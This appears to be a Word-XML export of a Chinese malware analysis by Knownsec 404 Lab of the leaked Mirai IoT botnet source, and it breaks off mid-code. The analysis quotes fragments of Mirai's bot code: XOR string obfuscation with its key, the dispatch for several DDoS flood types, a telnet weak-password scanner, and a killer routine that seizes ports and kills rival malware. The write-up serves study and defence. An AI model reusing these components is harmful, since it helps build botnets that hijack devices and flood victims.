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5F9" w:rsidRPr="00E715F9" w:rsidRDefault="00E715F9" w:rsidP="00E715F9">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:line="288" w:lineRule="atLeast"/>
        <w:ind w:hanging="45"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:spacing w:val="-30"/>
          <w:kern w:val="36"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E715F9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:spacing w:val="-30"/>
          <w:kern w:val="36"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t>Mirai</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E715F9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:spacing w:val="-30"/>
          <w:kern w:val="36"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E715F9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:spacing w:val="-30"/>
          <w:kern w:val="36"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t>源码分析</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E715F9" w:rsidRPr="00E715F9" w:rsidRDefault="00E715F9" w:rsidP="00E715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 9 days ago </w:t>
      </w:r>
      <w:r w:rsidRPr="00E715F9">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId5" w:history="1">
        <w:r w:rsidRPr="00E715F9">
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
            <w:color w:val="9EABB3"/>
            <w:kern w:val="0"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>漏洞分析</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId6" w:history="1">
        <w:r w:rsidRPr="00E715F9">
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
            <w:color w:val="9EABB3"/>
            <w:kern w:val="0"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>admin</w:t>
        </w:r>
      </w:hyperlink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Author: </w:t>
      </w:r>
      <w:r w:rsidRPr="00E715F9">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>xd0ol1 (</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E715F9">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>知道创宇</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E715F9">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>404实验室)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E715F9" w:rsidRPr="00E715F9" w:rsidRDefault="00E715F9" w:rsidP="00E715F9">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:after="100" w:afterAutospacing="1" w:line="288" w:lineRule="atLeast"/>
        <w:ind w:hanging="30"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:spacing w:val="-15"/>
          <w:kern w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E715F9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:spacing w:val="-15"/>
          <w:kern w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r w:rsidRPr="00E715F9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:spacing w:val="-15"/>
          <w:kern w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>背景概述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最近的德国断</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E715F9">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>网事件</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E715F9">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>让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Mirai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恶意程序再次跃入公众的视线，相对而言，目前的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IoT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领域对于恶意程序还是一片蓝海，因此吸引了越来越多的人开始涉足这趟征程。而作为安全研究者，我们有必要对此提高重视，本文将从另一角度，即以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Mirai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泄露的源码为例来小窥其冰山一角。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E715F9" w:rsidRPr="00E715F9" w:rsidRDefault="00E715F9" w:rsidP="00E715F9">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:after="100" w:afterAutospacing="1" w:line="288" w:lineRule="atLeast"/>
        <w:ind w:hanging="30"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:spacing w:val="-15"/>
          <w:kern w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E715F9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:spacing w:val="-15"/>
          <w:kern w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r w:rsidRPr="00E715F9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:spacing w:val="-15"/>
          <w:kern w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>源码分析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715F9">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>选此次</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E715F9">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>分析的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Mirai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源码（</w:t>
      </w:r>
      <w:r w:rsidRPr="00E715F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715F9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"https://github.com/jgamblin/Mirai-Source-Code" </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00E715F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715F9">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="57A3E8"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>https://github.com/jgamblin/Mirai-Source-Code</w:t>
      </w:r>
      <w:r w:rsidRPr="00E715F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715F9">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> ）主要包含loader、payload(bot)、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cnc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和tools四部分内容：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loader/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将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payload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上传到受感染的设备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mirai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/bot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在受感染设备上运行的恶意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payload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mirai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cnc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恶意者进行控制和管理的接口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mirai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/tools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提供的一些工具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其中，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cnc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部分是Go语言编写的，余下都由C语言编码完成。我们知道payload是在受害者设备上直接运行的那部分恶意代码，而loader的作用就是将其drop到这些设备上，比如宏病毒、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下载者等都属于loader的范畴。对恶意开发者来说，</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E715F9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E715F9">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>关键的也就是设计好loader和payload的功能，毕竟这与恶意操作能否成功息息相关，同时它们也是和受害者直接接触的那部分代码，因此这里的分析重点将集中在这两部分代码上，剩下的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cnc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和tools只做个概要分析。在详细分析之前，我们先给出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Mirai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对应的网络拓扑关系图，可以有个直观的认识：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27420" cy="5166360"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="3" name="图片 3" descr="http://paper.seebug.org/content/images/2016/12/DB682891-A522-4101-8390-029E6C02DF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per.seebug.org/content/images/2016/12/DB682891-A522-4101-8390-029E6C02DF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F9" w:rsidRPr="00E715F9" w:rsidRDefault="00E715F9" w:rsidP="00E715F9">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:after="100"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E715F9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>2.1 payload</w:t>
      </w:r>
      <w:r w:rsidRPr="00E715F9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>分析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这部分代码的主要功能是发起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DoS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攻击以及扫描其它可能受感染的设备，代码在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mirai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/bot目录，可简单划分为如下几个模块：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06640" cy="4381500"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:docPr id="2" name="图片 2" descr="http://paper.seebug.org/content/images/2016/12/3670474F-2082-458A-8E06-9946F9118A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per.seebug.org/content/images/2016/12/3670474F-2082-458A-8E06-9946F9118A5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我们首先看一下public模块，主要是一些常用的公共函数，供其它几个模块调用：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/******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checksum.c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******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构造数据包原始套接字时会用到校验和的计算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计算数据包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ip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头中的校验和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uint16_t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checksum_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generic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uint16_t *, uint32_t);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计算数据包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tcp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头中的校验和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uint16_t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checksum_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tcpudp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iphdr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uint16_t,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/******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rand.c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******/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初始化随机数因子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rand_init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生成一个随机数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lastRenderedPageBreak/>
        <w:t xml:space="preserve">uint32_t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rand_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next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生成特定长度的随机字符串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rand_str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生成包含数字字母的特定长度的随机字符串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rand_alphastr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 *,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/******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resolv.c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******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处理域名的解析，参考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DNS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报文格式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域名按字符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'.'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进行划分，并保存各段长度，构造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DNS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请求包时会用到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resolv_domain_to_hostname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处理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DNS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响应包中的解析结果，可参照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DNS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数据包结构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static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resolv_skip_name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 *reader, uint8_t *buffer,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*count);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构造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DNS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请求包向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8.8.8.8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进行域名解析，并获取响应包中的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IP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resolv_entries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resolv_lookup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释放用来保存域名解析结果的空间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resolv_entries_free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resolv_entries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/******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******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处理硬编码在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中的数据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初始化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中的成员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table_init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解密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中对应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id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的成员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table_unlock_val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 id);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加密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中对应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id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的成员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table_lock_val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 id);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取出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中对应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id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的成员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table_retrieve_val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id,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向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中添加成员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static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add_entry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 id,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buf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buf_len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lastRenderedPageBreak/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和密钥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key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进行异或操作，即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中数据的加密或解密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static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toggle_obf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(uint8_t id);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/******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util.c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******/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......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在内存中查找特定的字节序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util_memsearch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buf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buf_len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*mem,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mem_len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在具体字符串中查找特定的子字符串，忽略大小写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util_stristr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*haystack,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haystack_len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str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获取本地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ip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信息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ipv4_t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util_local_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addr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读取描述符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对应文件中的字符串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util_fdgets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*buffer,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buffer_size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......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其中，用的比较多的有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rand.c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0"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="22313F"/>
        </w:rPr>
        <w:t>rand_next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函数，即生成一个整型随机数，以及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table.c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0"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="22313F"/>
        </w:rPr>
        <w:t>table_unlock_val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0"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="22313F"/>
        </w:rPr>
        <w:t>table_retrieve_val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和 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0"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="22313F"/>
        </w:rPr>
        <w:t>table_lock_val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 函数组合，即获取table中的数据，程序中用到的一些信息是硬编码后保存到table中的，如果获取就要用到这个组合，其中涉及到简单的异或加密和解密，这里举个例子：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保存到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中的硬编码信息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add_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entry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TABLE_EXEC_SUCCESS, </w:t>
      </w:r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"\x4E\x4B\x51\x56\x47\x4C\x4B\x4C\x45\x02\x56\x57\x4C\x12\x22"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15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调用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table_unlock_val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解密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初始化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key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，其中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table_key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= 0xdeadbeef;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uint8_t k1 =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table_key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&amp;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0xff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    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//0xef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k2 = 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table_key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&gt;&gt;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8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 &amp;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0xff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</w:t>
      </w:r>
      <w:proofErr w:type="gram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/0xbe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k3 = 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table_key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&gt;&gt;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16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 &amp;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0xff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//0xad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k4 = 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table_key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&gt;&gt;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24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 &amp;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0xff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//0xde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循环异或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=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&lt;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val_len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++)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lastRenderedPageBreak/>
        <w:t>{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val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] ^= k1;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val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] ^= k2;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val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] ^= k3;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val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] ^= k4;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解密后的信息：</w:t>
      </w:r>
      <w:proofErr w:type="gram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listening</w:t>
      </w:r>
      <w:proofErr w:type="gram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tun0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这时调用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table_retrieve_val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就可以获取到所需信息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最后调用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table_lock_val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加密，同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table_unlock_val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调用，利用的是两次异或后结果不变的性质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不过</w:t>
      </w:r>
      <w:proofErr w:type="gram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考虑到异或</w:t>
      </w:r>
      <w:proofErr w:type="gram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的交换律和结合律，上述操作实际上也就相当于各字节异或一次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0x22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*/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接着来看attack模块，此模块的作用就是解析下发的攻击命令并发动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DoS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攻击，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attack.c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中主要就是下述两个函数：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/******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attack.c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******/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按照事先约定的格式解析下发的攻击命令，即取出攻击参数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attack_parse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buf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调用相应的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DoS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攻击函数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attack_start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duration, ATTACK_VECTOR vector, uint8_t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targs_len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attack_target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targs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uint8_t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opts_len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attack_option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*opts)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{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......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else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if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(pid2 ==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父进程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DoS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持续时间到了后</w:t>
      </w:r>
      <w:proofErr w:type="gram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由子进程</w:t>
      </w:r>
      <w:proofErr w:type="gram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负责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kill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掉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sleep(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duration);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kill(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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getppid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(),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9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exit(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    ......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(methods[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]-&gt;vector == vector)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    {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92672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E715F9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="F92672"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>ifdef</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E715F9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="F92672"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> DEBUG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"[attack] Starting attack...\n"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endif</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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    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//C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语言函数指针实现的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C++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多态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methods[</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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]-&gt;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func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targs_len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targs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opts_len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, opts);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break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    }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......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而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attack</w:t>
      </w:r>
      <w:r w:rsidRPr="00E715F9">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>app.c</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E715F9">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E715F9">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>attack</w:t>
      </w:r>
      <w:r w:rsidRPr="00E715F9">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>gre.c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attack</w:t>
      </w:r>
      <w:r w:rsidRPr="00E715F9">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>tcp.c</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E715F9">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E715F9">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>attack</w:t>
      </w:r>
      <w:r w:rsidRPr="00E715F9">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>udp.c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中实现了具体的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DoS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攻击函数：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/*1</w:t>
      </w:r>
      <w:proofErr w:type="gram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)Straight</w:t>
      </w:r>
      <w:proofErr w:type="gram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up UDP flood  2)Valve Source Engine query flood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 3</w:t>
      </w:r>
      <w:proofErr w:type="gram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)DNS</w:t>
      </w:r>
      <w:proofErr w:type="gram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water torture  4)Plain UDP flood optimized for speed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attack_udp_generic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attack_target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attack_option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attack_udp_vse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attack_target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attack_option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attack_udp_dns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attack_target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attack_option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attack_udp_plain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attack_target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attack_option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/*1</w:t>
      </w:r>
      <w:proofErr w:type="gram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)SYN</w:t>
      </w:r>
      <w:proofErr w:type="gram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flood with options  2)ACK flood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 3</w:t>
      </w:r>
      <w:proofErr w:type="gram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)ACK</w:t>
      </w:r>
      <w:proofErr w:type="gram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flood to bypass mitigation devices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lastRenderedPageBreak/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attack_tcp_syn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attack_target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attack_option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attack_tcp_ack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attack_target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attack_option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attack_tcp_stomp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attack_target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attack_option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 1</w:t>
      </w:r>
      <w:proofErr w:type="gram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)GRE</w:t>
      </w:r>
      <w:proofErr w:type="gram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IP flood  2)GRE Ethernet flood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attack_gre_ip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attack_target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attack_option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attack_gre_eth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attack_target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attack_option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 HTTP layer 7 flood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attack_app_http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attack_target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attack_option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可以看到这里设计的函数接口是统一的，因而可以定义如下函数指针，通过这种方式就可以实现和C++多态同样的功能，方便进行扩展：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typedef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(*ATTACK_FUNC) (uint8_t,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attack_target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*, uint8_t,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attack_option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*);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实际上attack这个模块是可以完整剥离出来的，只需在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attack</w:t>
      </w:r>
      <w:r w:rsidRPr="00E715F9">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>parse</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E715F9">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E715F9">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>attack</w:t>
      </w:r>
      <w:r w:rsidRPr="00E715F9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函数上加一层封装就可以了，要加入其它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DoS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攻击函数只需符合ATTACK_FUNC的接口即可。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再来看scanner模块，其功能就是扫描其它可能受感染的设备，如果能满足telnet弱口令登录则将结果进行上报，恶意者主要借此扩张僵尸网络，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scanner.c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中的主要函数如下：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/******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scanner.c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******/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将接收到的空字符替换为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'A'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recv_strip_null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sock,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buf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flags);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首先生成随机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ip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，而后随机选择字典中的用户名密码组合进行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telnet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登录测试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scanner_init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如果扫描的随机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ip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有回应，则建立正式连接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lastRenderedPageBreak/>
        <w:t>static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setup_connection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scanner_connection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*conn);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获取随机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ip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地址，特殊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ip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段除外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static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ipv4_t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get_random_ip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向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auth_table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中添加字典数据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static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add_auth_entry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enc_user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enc_pass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uint16_t weight);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随机返回一条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auth_table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中的记录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static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scanner_auth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random_auth_entry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上报成功的扫描结果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static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report_working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(ipv4_t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daddr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uint16_t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dport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scanner_auth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auth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对字典中的字符串进行异或解密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static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deobf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str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为了提高扫描效率，程序对随机生成的IP会先通过构造的原始套接字进行试探性连接，如果有回应才进行后续的telnet登录测试，而这个交互过程和后面的loader与感染节点建立telnet交互后上传恶意payload文件有重复，因此这里就不展开了，可以参考后面的分析。此外，弱口令字典同样采用了硬编码的方式，解密也是采用的异或操作，这和前面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table.c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中的情形是相似的，也不赘述了。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最后我们来看下kill模块，此模块主要有两个作用，其一是关闭特定的端口并占用，另一是删除特定文件并kill对应进程，简单来说就是排除异己。我们看</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E715F9">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>下其中</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E715F9">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>kill掉22端口的代码：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/******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kill.c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******/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......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查找特定端口对应的</w:t>
      </w:r>
      <w:proofErr w:type="gram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的</w:t>
      </w:r>
      <w:proofErr w:type="gram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进程并将其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kill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掉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killer_kill_by_port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htons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22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)))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92672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E715F9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="F92672"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>ifdef</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E715F9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="F92672"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> DEBUG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 xml:space="preserve">"[killer] Killed </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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tcp</w:t>
      </w:r>
      <w:proofErr w:type="spell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/22 (SSH)\n"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endif</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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通过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bind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进行端口占用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tmp_bind_addr.sin_port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htons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22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tmp_bind_fd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= socket(AF_INET, SOCK_STREAM,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)) != -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bind(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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tmp_bind_fd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, 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sockaddr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*)&amp;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tmp_bind_addr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sizeof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sockaddr_in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listen(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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tmp_bind_fd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......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另外两处kill掉23端口和80端口的代码与此类似，在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killer</w:t>
      </w:r>
      <w:r w:rsidRPr="00E715F9">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>kill</w:t>
      </w:r>
      <w:r w:rsidRPr="00E715F9">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>by_port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函数中实现了通过端口来查找进程的功能，其中：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/proc/net/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tcp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记录了所有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tcp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连接的情况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/proc/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pid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/exe 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包含了正在进程中运行的程序链接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/proc/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pid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包含了进程打开的每一个文件的链接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/proc/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pid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/status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包含了进程的状态信息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此外，程序将通过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readdir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函数遍历/proc下的进程文件夹来查找特定文件，而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readlink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函数可以获取进程所对应程序的真实路径，这里会查找与之同类的恶意程序anime，如果找到就删除文件并kill掉进程：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 If path contains ".anime" kill.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util_stristr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realpath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rp_len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-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table_retrieve_val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(TABLE_KILLER_ANIME, NULL)) != -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{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unlink(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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realpath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kill(</w:t>
      </w:r>
